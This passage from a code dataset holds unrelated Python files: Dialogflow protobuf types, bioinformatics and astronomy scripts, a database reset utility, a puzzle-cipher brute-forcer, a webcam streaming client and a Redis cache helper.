"scrapy.Spider", "line_number": 5, "usage_type": "attribute"}, {"api_name": "meinvPro.items.MeinvproItem", "line_number": 30, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 32, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "395911847", "text": "# -*- coding: utf-8 -*-\n# Copyright 2022 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import annotations\n\nfrom typing import MutableMapping, MutableSequence\n\nfrom google.protobuf import field_mask_pb2 # type: ignore\nimport proto # type: ignore\n\n__protobuf__ = proto.module(\n package=\"google.cloud.dialogflow.v2beta1\",\n manifest={\n \"KnowledgeBase\",\n \"ListKnowledgeBasesRequest\",\n \"ListKnowledgeBasesResponse\",\n \"GetKnowledgeBaseRequest\",\n \"CreateKnowledgeBaseRequest\",\n \"DeleteKnowledgeBaseRequest\",\n \"UpdateKnowledgeBaseRequest\",\n },\n)\n\n\nclass KnowledgeBase(proto.Message):\n r\"\"\"A knowledge base represents a collection of knowledge documents that\n you provide to Dialogflow. Your knowledge documents contain\n information that may be useful during conversations with end-users.\n Some Dialogflow features use knowledge bases when looking for a\n response to an end-user input.\n\n For more information, see the `knowledge base\n guide <https://cloud.google.com/dialogflow/docs/how/knowledge-bases>`__.\n\n Note: The ``projects.agent.knowledgeBases`` resource is deprecated;\n only use ``projects.knowledgeBases``.\n\n Attributes:\n name (str):\n The knowledge base resource name. The name must be empty\n when creating a knowledge base. 
Format:\n ``projects/<Project ID>/locations/<Location ID>/knowledgeBases/<Knowledge Base ID>``.\n display_name (str):\n Required. The display name of the knowledge\n base. The name must be 1024 bytes or less;\n otherwise, the creation request fails.\n language_code (str):\n Language which represents the KnowledgeBase.\n When the KnowledgeBase is created/updated, this\n is populated for all non en-us languages. If not\n populated, the default language en-us applies.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n display_name: str = proto.Field(\n proto.STRING,\n number=2,\n )\n language_code: str = proto.Field(\n proto.STRING,\n number=4,\n )\n\n\nclass ListKnowledgeBasesRequest(proto.Message):\n r\"\"\"Request message for\n [KnowledgeBases.ListKnowledgeBases][google.cloud.dialogflow.v2beta1.KnowledgeBases.ListKnowledgeBases].\n\n Attributes:\n parent (str):\n Required. The project to list of knowledge bases for.\n Format: ``projects/<Project ID>/locations/<Location ID>``.\n page_size (int):\n The maximum number of items to return in a\n single page. By default 10 and at most 100.\n page_token (str):\n The next_page_token value returned from a previous list\n request.\n filter (str):\n The filter expression used to filter knowledge bases\n returned by the list method. The expression has the\n following syntax:\n\n <field> <operator> <value> [AND <field> <operator> <value>] ...\n\n The following fields and operators are supported:\n\n - display_name with has(:) operator\n - language_code with equals(=) operator\n\n Examples:\n\n - 'language_code=en-us' matches knowledge bases with en-us\n language code.\n - 'display_name:articles' matches knowledge bases whose\n display name contains \"articles\".\n - 'display_name:\"Best Articles\"' matches knowledge bases\n whose display name contains \"Best Articles\".\n - 'language_code=en-gb AND display_name=articles' matches\n all knowledge bases whose display name contains\n \"articles\" and whose language code is \"en-gb\".\n\n Note: An empty filter string (i.e. \"\") is a no-op and will\n result in no filtering.\n\n For more information about filtering, see `API\n Filtering <https://aip.dev/160>`__.\n \"\"\"\n\n parent: str = proto.Field(\n proto.STRING,\n number=1,\n )\n page_size: int = proto.Field(\n proto.INT32,\n number=2,\n )\n page_token: str = proto.Field(\n proto.STRING,\n number=3,\n )\n filter: str = proto.Field(\n proto.STRING,\n number=4,\n )\n\n\nclass ListKnowledgeBasesResponse(proto.Message):\n r\"\"\"Response message for\n [KnowledgeBases.ListKnowledgeBases][google.cloud.dialogflow.v2beta1.KnowledgeBases.ListKnowledgeBases].\n\n Attributes:\n knowledge_bases (MutableSequence[google.cloud.dialogflow_v2beta1.types.KnowledgeBase]):\n The list of knowledge bases.\n next_page_token (str):\n Token to retrieve the next page of results,\n or empty if there are no more results in the\n list.\n \"\"\"\n\n @property\n def raw_page(self):\n return self\n\n knowledge_bases: MutableSequence[\"KnowledgeBase\"] = proto.RepeatedField(\n proto.MESSAGE,\n number=1,\n message=\"KnowledgeBase\",\n )\n next_page_token: str = proto.Field(\n proto.STRING,\n number=2,\n )\n\n\nclass GetKnowledgeBaseRequest(proto.Message):\n r\"\"\"Request message for\n [KnowledgeBases.GetKnowledgeBase][google.cloud.dialogflow.v2beta1.KnowledgeBases.GetKnowledgeBase].\n\n Attributes:\n name (str):\n Required. The name of the knowledge base to retrieve. 
Format\n ``projects/<Project ID>/locations/<Location ID>/knowledgeBases/<Knowledge Base ID>``.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n\n\nclass CreateKnowledgeBaseRequest(proto.Message):\n r\"\"\"Request message for\n [KnowledgeBases.CreateKnowledgeBase][google.cloud.dialogflow.v2beta1.KnowledgeBases.CreateKnowledgeBase].\n\n Attributes:\n parent (str):\n Required. The project to create a knowledge base for.\n Format: ``projects/<Project ID>/locations/<Location ID>``.\n knowledge_base (google.cloud.dialogflow_v2beta1.types.KnowledgeBase):\n Required. The knowledge base to create.\n \"\"\"\n\n parent: str = proto.Field(\n proto.STRING,\n number=1,\n )\n knowledge_base: \"KnowledgeBase\" = proto.Field(\n proto.MESSAGE,\n number=2,\n message=\"KnowledgeBase\",\n )\n\n\nclass DeleteKnowledgeBaseRequest(proto.Message):\n r\"\"\"Request message for\n [KnowledgeBases.DeleteKnowledgeBase][google.cloud.dialogflow.v2beta1.KnowledgeBases.DeleteKnowledgeBase].\n\n Attributes:\n name (str):\n Required. The name of the knowledge base to delete. Format:\n ``projects/<Project ID>/locations/<Location ID>/knowledgeBases/<Knowledge Base ID>``.\n force (bool):\n Optional. Force deletes the knowledge base.\n When set to true, any documents in the knowledge\n base are also deleted.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n force: bool = proto.Field(\n proto.BOOL,\n number=2,\n )\n\n\nclass UpdateKnowledgeBaseRequest(proto.Message):\n r\"\"\"Request message for\n [KnowledgeBases.UpdateKnowledgeBase][google.cloud.dialogflow.v2beta1.KnowledgeBases.UpdateKnowledgeBase].\n\n Attributes:\n knowledge_base (google.cloud.dialogflow_v2beta1.types.KnowledgeBase):\n Required. The knowledge base to update.\n update_mask (google.protobuf.field_mask_pb2.FieldMask):\n Optional. Not specified means ``update all``. Currently,\n only ``display_name`` can be updated, an InvalidArgument\n will be returned for attempting to update other fields.\n \"\"\"\n\n knowledge_base: \"KnowledgeBase\" = proto.Field(\n proto.MESSAGE,\n number=1,\n message=\"KnowledgeBase\",\n )\n update_mask: field_mask_pb2.FieldMask = proto.Field(\n proto.MESSAGE,\n number=2,\n message=field_mask_pb2.FieldMask,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n", "sub_path": "google/cloud/dialogflow_v2beta1/types/knowledge_base.py", "file_name": "knowledge_base.py", "file_ext": "py", "file_size_in_byte": 8449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "proto.module", "line_number": 23, "usage_type": "call"}, {"api_name": "proto.Message", "line_number": 37, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 66, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 67, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 70, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 71, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 74, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 75, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 80, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 125, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 126, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 129, "usage_type": "call"}, {"api_name": "proto.INT32", "line_number": 130, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 133, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 134, "usage_type": "attribute"}, 
{"api_name": "proto.Field", "line_number": 137, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 138, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 143, "usage_type": "attribute"}, {"api_name": "typing.MutableSequence", "line_number": 160, "usage_type": "name"}, {"api_name": "proto.RepeatedField", "line_number": 160, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 161, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 165, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 166, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 171, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 181, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 182, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 187, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 199, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 200, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 203, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 204, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 210, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 224, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 225, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 228, "usage_type": "call"}, {"api_name": "proto.BOOL", "line_number": 229, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 234, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 247, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 248, "usage_type": "attribute"}, {"api_name": "google.protobuf.field_mask_pb2.FieldMask", "line_number": 252, "usage_type": "attribute"}, {"api_name": "google.protobuf.field_mask_pb2", "line_number": 252, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 252, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 253, "usage_type": "attribute"}, {"api_name": "google.protobuf.field_mask_pb2.FieldMask", "line_number": 255, "usage_type": "attribute"}, {"api_name": "google.protobuf.field_mask_pb2", "line_number": 255, "usage_type": "name"}]} +{"seq_id": "383942328", "text": "from datetime import datetime\nimport os.path\nimport urllib2\n\n\ndata_atual = datetime.now()\ndata_padronizada = data_atual.strftime('%d/%m/%Y %H:%M')\n\n\nclass DataHora:\n def escrever_data_hora(self):\n caminho = os.path.join('arquivos', 'data_hora.txt')\n with open(caminho, 'a') as arquivo:\n arquivo.write(data_padronizada)\n arquivo.write(\"\\n\")\n\n def data_hora(self):\n if os.path.exists('arquivos/data_hora.txt'):\n self.escrever_data_hora()\n print('Data e hora registradas.')\n else:\n self.escrever_data_hora()\n print('Arquivo criado.')\n\n def verificar_ou_criar_dir(self):\n if os.path.isdir('arquivos'):\n print('Diretorio pronto para uso.')\n else:\n os.mkdir('arquivos')\n print('Diretorio criado.')\n self.data_hora()\n\n\nclass WebPage:\n def webpage(self):\n response = urllib2.urlopen(\"http://www.google.com.br\")\n local = os.path.join('arquivos', 'google.html')\n with open(local, 'a') as arq:\n arq.write(response.read())\n\n print('Arquivo html no diretorio.')\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "data_hora/data_hora_webpage.py", "file_name": "data_hora_webpage.py", "file_ext": "py", "file_size_in_byte": 1162, "program_lang": 
"python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "datetime.datetime.now", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.path.isdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 26, "usage_type": "name"}, {"api_name": "os.path.mkdir", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "name"}, {"api_name": "urllib2.urlopen", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "530066528", "text": "from Bio import SeqIO\n\nheader_list = []\nantibody_list = []\nseq_list = []\ncdrh3_locations = []\nhcdr3_sequences = []\n\n# parses data from .fasta file and places headers and sequences into lists\nfor record in SeqIO.parse(\"all_BNABs_for_table.SMUA.kappas.Mar15.fasta\",\n \"fasta\"):\n header_list.append(record.id)\n seq_list.append(str(record.seq))\n\n# we can isolate the start of the CDRH3 location by counting the number of\n# markupcode positions before the vdj and we can isolate the end of the CDRH3\n# by adding the total number of V, n, D, and J markup positions\n\n# below pulls out the name of each antibody from the header list\nfor i in range(0, len(header_list), 3):\n antibody_list.append(header_list[i])\n\n# below pulls out the markup from the list to identify where the CDRH3 is\nfor i in range(2, len(seq_list), 3):\n VDJ_start = seq_list[i].count('1') + seq_list[i].count('A') + seq_list[\n i].count('2') + seq_list[i].count('B') + seq_list[i].count('3')\n VDJ_end = seq_list[i].count('V') + seq_list[i].count('n') + seq_list[\n i].count('D') + seq_list[i].count('J') + VDJ_start\n cdrh3_location = [VDJ_start, VDJ_end]\n cdrh3_locations.append(cdrh3_location)\n\n# below pulls out the sequences of the cdrh3 from each bnab\nfor i in range(0, len(seq_list), 3):\n sequence = seq_list[i]\n index_one, index_two = cdrh3_locations[int(i/3)]\n hcdr3_sequences.append(sequence[index_one:index_two])\n\n# below combines the antibody name and cdrh3 length into a dictionary\nkappa_chain_dictionary = dict(zip(antibody_list, hcdr3_sequences))\nprint(kappa_chain_dictionary)", "sub_path": "CDRH3 extraction/CDRH3_extraction_kappa_chain.py", "file_name": "CDRH3_extraction_kappa_chain.py", "file_ext": "py", "file_size_in_byte": 1621, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 10, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "374923535", "text": "import xidplus\nimport pickle\nimport numpy as np\nfrom xidplus import catalogue\nfrom xidplus import moc_routines\nfrom astropy import wcs\nfrom 
astropy.io import fits\nfrom xidplus import posterior_maps as postmaps\nfrom astropy import wcs\n\nimport os\nimport sys\n\nsys.path.remove(\"/mnt/pact/im281/HELP/XID_plus\")\nsys.path.remove(\"/mnt/pact/im281/HELP/herschelhelp_python\")\n\noutput_folder='./data/'\n\n\nwith open(output_folder+'Tiles.pkl',\"rb\") as f:\n Master = pickle.load(f)\ntiles=Master['tiles']\norder=Master['order']\n\n\noutfile=output_folder+'Master_prior.pkl'\nwith open(outfile, 'rb') as f:\n obj=pickle.load(f)\npriors=obj['priors']\n\n\n\n#hdulist24=fits.open(output_folder+'dmu26_XID+MIPS_ELAIS-N2_Bayes_Pval.fits')\nhdulist24=postmaps.make_fits_image(priors[0],np.full_like(priors[0].sim,np.nan))\n\n\n\nfailed_tiles=[]\nfor i in range(0,len(tiles)):\n\tprint('On tile '+str(i)+' out of '+str(len(tiles)))\n\ttry:\n\t\tBayes_24_tile=fits.open(output_folder+'Tile_'+str(tiles[i])+'_'+str(order)+'_MIPS_24_Bayes_Pval.fits')\n\n\t\tx_ind,y_ind=np.meshgrid(np.arange(0,Bayes_24_tile[1].header['NAXIS1'],dtype=np.int16)-Bayes_24_tile[1].header['CRPIX1']+hdulist24[1].header['CRPIX1'],np.arange(0,Bayes_24_tile[1].header['NAXIS2'],dtype=np.int16)-Bayes_24_tile[1].header['CRPIX2']+hdulist24[1].header['CRPIX2'])\n\n\t\tgood=Bayes_24_tile[1].data>-6\n\n\t\thdulist24[1].data[y_ind[good].astype(np.int16),x_ind[good].astype(np.int16)]=Bayes_24_tile[1].data[good]\n\t\t\n\n\n\t\tBayes_24_tile.close()\n\texcept IOError:\n\t\tprint('issue with tile '+str(tiles[i]))\n\t\tfailed_tiles.append(tiles[i])\n\t\n\nhdulist24.writeto(output_folder+'dmu26_XID+MIPS_EGS_Bayes_Pval.fits',clobber=True)\n\noutfile=output_folder+'failed_tiles.pkl'\nwith open(outfile, 'wb') as f:\n pickle.dump({'tiles':failed_tiles,'order':order},f)\n", "sub_path": "dmu26/dmu26_XID+MIPS_EGS/make_combined_map.py", "file_name": "make_combined_map.py", "file_ext": "py", "file_size_in_byte": 1765, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.remove", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.path.remove", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 28, "usage_type": "call"}, {"api_name": "xidplus.posterior_maps.make_fits_image", "line_number": 34, "usage_type": "call"}, {"api_name": "xidplus.posterior_maps", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.full_like", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 34, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.open", "line_number": 42, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.int16", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "569301623", "text": "from db.models.base import engine, Session\nimport sqlalchemy as sqla # pylint: disable=E0401\nimport sqlalchemy.ext.declarative as sqld # pylint: disable=E0401\n\n\ndef destroy():\n\tprint(\"Destroying DB\")\n\tsqla_base = sqld.declarative_base()\n\tsqla_base.metadata.bind = 
engine\n\tsqla_base.metadata.drop_all()\n\n\t# sql = sqla.text(\"SET FOREIGN_KEY_CHECKS = 0\")\n\tsession = Session()\n\t# session.execute(sql)\n\tfor table in engine.table_names():\n\t\tsql = sqla.text(\"DROP TABLE IF EXISTS {} CASCADE \".format(table))\n\t\tprint(sql)\n\t\tsession.execute(sql)\n\tprint(\"Destroying DB Complete\")\n\n\nif __name__ == '__main__':\n\tdestroy()\n", "sub_path": "backend/db/scripts/destroy.py", "file_name": "destroy.py", "file_ext": "py", "file_size_in_byte": 612, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 8, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative", "line_number": 8, "usage_type": "name"}, {"api_name": "db.models.base.engine", "line_number": 9, "usage_type": "name"}, {"api_name": "db.models.base.Session", "line_number": 13, "usage_type": "call"}, {"api_name": "db.models.base.engine.table_names", "line_number": 15, "usage_type": "call"}, {"api_name": "db.models.base.engine", "line_number": 15, "usage_type": "name"}, {"api_name": "sqlalchemy.text", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "568286310", "text": "import base64\nimport random\nimport string\nimport binascii\n\nrounds = 80\n\n\ndef decrypt(flag, key):\n for i in range(rounds):\n print(\"got to round: \"+ str(i))\n encode_b64 = key[\"base64_chosen\"].pop()\n if encode_b64:\n flag = base64.b64decode(flag.encode('utf8')).decode('utf8')\n else:\n alphabet = string.ascii_letters + string.digits\n shift = key[\"shift\"].pop()\n alphabet_shift = alphabet[:-shift] + alphabet[-shift:]\n flag = flag.translate(str.maketrans(alphabet, alphabet_shift))\n return flag\n\n\ndef record_possible_key():\n random.seed()\n recorded_key = {\"base64_chosen\": [],\n \"shift\": []}\n for i in range(rounds):\n encode_b64 = random.random() < 0.5\n recorded_key[\"base64_chosen\"].append(encode_b64)\n if not encode_b64:\n alphabet = string.ascii_letters + string.digits\n shift = random.randint(1, len(alphabet))\n recorded_key[\"shift\"].append(shift)\n return recorded_key\n\n\ndef attempt_decrypt(actual_encrypted_flag):\n key = record_possible_key()\n try:\n possible_flag = decrypt(actual_encrypted_flag, key)\n except binascii.Error:\n print(\"binascii exception, base 64 when we shouldn't of\")\n return False, ''\n success = possible_flag[:3].lower() in ['sctf', 'flag']\n return success, possible_flag\n\n\ndef main():\n actual_encrypted_flag = open('encrypted.txt').read()\n success, possible_flag = attempt_decrypt(actual_encrypted_flag)\n tries = 0\n while not success:\n tries += 1\n print(tries)\n success, possible_flag = attempt_decrypt(actual_encrypted_flag)\n print(\"success: \" + possible_flag)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "ciphered/encrypt.py", "file_name": "encrypt.py", "file_ext": "py", "file_size_in_byte": 1766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "base64.b64decode", "line_number": 14, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 16, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 16, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 24, "usage_type": "call"}, {"api_name": "random.random", "line_number": 28, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 31, "usage_type": "attribute"}, {"api_name": "string.digits", 
"line_number": 31, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 32, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 41, "usage_type": "attribute"}]} +{"seq_id": "637867349", "text": "\"\"\"\nProject: FandRec\nProgrammed by: Trenton Sauer, Trenton Scott, David Williams\nLast Modified:\nDescription: Client for the camera\nNotes:\n 1. camera_client needs to be installed and run on the machine\n that will be sending the frames to the server\n Liscense:\nCopyright (c) 2018, FandRec Dev Team\nAll rights reserved.\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n * Neither the name of the FandRec Dev Team nor the\n names of its contributors may be used to endorse or promote products\n derived from this software without specific prior written permission.\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL FandRec Dev Team BE LIABLE FOR ANY\nDIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n#==============================Imports=======================================\nimport sys, ujson, cv2, imutils\nimport numpy as np\n\nfrom twisted.python import log\n\nfrom twisted.protocols.basic import NetstringReceiver\n\nfrom autobahn.twisted.websocket import WebSocketClientFactory, \\\n WebSocketClientProtocol, connectWS\nfrom twisted.internet import reactor\nfrom imutils.video import WebcamVideoStream\n#=======================Application Interface===========================\nclass CameraClientProtocol(WebSocketClientProtocol):\n \"\"\"\n Description: Handles the receiving messages from the\n\t\t server and sends the frames back.\n \"\"\"\n #raw_frame = cv2.UMat(np.empty((540, 1172, 3), np.uint8))\n\n def __init__(self):\n self.fps = 10\n\n def onOpen(self):\n self.sendFrames()\n\n def sendFrames(self):\n \"\"\"\n Description: Gets a frame from the camera then\n encodes it as a json then sends it.\n \"\"\"\n\t# Grab frame\n frame = cv2.UMat(self.factory.camera.read())\n frame = cv2.resize(frame, (640,480))\n\n\t# Compress and Package frame\n out = cv2.imencode('.jpg', frame, [cv2.IMWRITE_JPEG_QUALITY, 70])[1].tolist()\n out = ujson.dumps(out)\n\n\t# Send frame\n self.sendMessage(out.encode(\"utf8\"))\n reactor.callLater(1/self.fps, self.sendFrames)\n\n\nclass CameraClientFactory(WebSocketClientFactory):\n \"\"\"\n Description: Starts the video capture from the local kinect or camera.\n \"\"\"\n def __init__(self, addr, cam_port):\n WebSocketClientFactory.__init__(self, addr, headers={'camera_id': 'camera1'})\n 
print(\"Starting Camera\")\n self.camera = WebcamVideoStream(src=0).start()\n\n#=================Client Main===================================\n\ndef main():\n \"\"\"\n Description: Starts CameraClientProtocol defined above which sends\n the frames from the camera to the server\n \"\"\"\n #STEP 1: Setup the factory\n log.startLogging(sys.stdout)\n ip_address = \"127.0.0.1\"\n port_num = 8091\n\n factory = CameraClientFactory(\"ws://\" + ip_address + \":\" + str(port_num), 0)\n factory.protocol = CameraClientProtocol\n reactor.connectTCP(ip_address, port_num, factory)\n\n #STEP 2: Start the reactor\n reactor.run()\n\nif __name__ == '__main__':\n main()\n", "sub_path": "camera_client.py", "file_name": "camera_client.py", "file_ext": "py", "file_size_in_byte": 4051, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "autobahn.twisted.websocket.WebSocketClientProtocol", "line_number": 46, "usage_type": "name"}, {"api_name": "cv2.UMat", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 69, "usage_type": "attribute"}, {"api_name": "ujson.dumps", "line_number": 70, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 74, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 74, "usage_type": "name"}, {"api_name": "autobahn.twisted.websocket.WebSocketClientFactory", "line_number": 77, "usage_type": "name"}, {"api_name": "autobahn.twisted.websocket.WebSocketClientFactory.__init__", "line_number": 82, "usage_type": "call"}, {"api_name": "autobahn.twisted.websocket.WebSocketClientFactory", "line_number": 82, "usage_type": "name"}, {"api_name": "imutils.video.WebcamVideoStream", "line_number": 84, "usage_type": "call"}, {"api_name": "twisted.python.log.startLogging", "line_number": 94, "usage_type": "call"}, {"api_name": "twisted.python.log", "line_number": 94, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 94, "usage_type": "attribute"}, {"api_name": "twisted.internet.reactor.connectTCP", "line_number": 100, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 100, "usage_type": "name"}, {"api_name": "twisted.internet.reactor.run", "line_number": 103, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "635045284", "text": "import redis, json, datetime, logging\nimport config\n\nlog = logging.getLogger(__name__)\n\ndef check_cache(key):\n \"\"\"\n check the cache for an object stored under the given key, and convert it\n from a string into a python object\n \"\"\"\n client = redis.StrictRedis(host=config.REDIS_CACHE_HOST, port=config.REDIS_CACHE_PORT, db=config.REDIS_CACHE_DB)\n s = client.get(key)\n \n if s is None:\n return None\n \n try:\n obj = json.loads(s)\n except ValueError as e:\n # cache is corrupt, just get rid of it\n invalidate(key)\n return None\n \n return obj\n \ndef is_stale(bibjson):\n \"\"\"\n Check to see if the bibjson record in the supplied record is stale. Look\n in bibjson['license'][n]['provenance']['date'] for all n. If the newest date\n is older than the stale time, then the record is stale. 
If the record does\n not have a licence, it is stale.\n \"\"\"\n # check that the record has a licence at all\n if not \"license\" in bibjson:\n return True\n \n # get the date strings of all the licences\n log.debug(\"stale check on: \" + str(bibjson))\n date_strings = [licence.get(\"provenance\", {}).get(\"date\") \n for licence in bibjson.get(\"license\", []) \n if licence.get(\"provenance\", {}).get(\"date\") is not None]\n \n # check that there were any dates, if not then the record is necessarily stale\n if len(date_strings) == 0:\n return True\n \n # convert all the viable date strings to datetimes\n dates = []\n for d in date_strings:\n try:\n dt = datetime.datetime.strptime(d, config.date_format)\n dates.append(dt)\n except ValueError as e:\n continue\n \n # check that at least one date has parsed, and if not assume that the record is stale\n if len(dates) == 0:\n return True\n \n # get the most recent date by sorting the list (reverse, most recent date first)\n dates.sort(reverse=True)\n most_recent = dates[0]\n \n # now determine if the most recent date is older or newer than the stale timeout\n td = datetime.timedelta(seconds=config.licence_stale_time)\n n = datetime.datetime.now()\n stale_date = most_recent + td\n return stale_date < n\n \ndef invalidate(key):\n \"\"\"\n remove anything identified by the supplied key from the cache\n \"\"\"\n client = redis.StrictRedis(host=config.REDIS_CACHE_HOST, port=config.REDIS_CACHE_PORT, db=config.REDIS_CACHE_DB)\n client.delete(key)\n \ndef 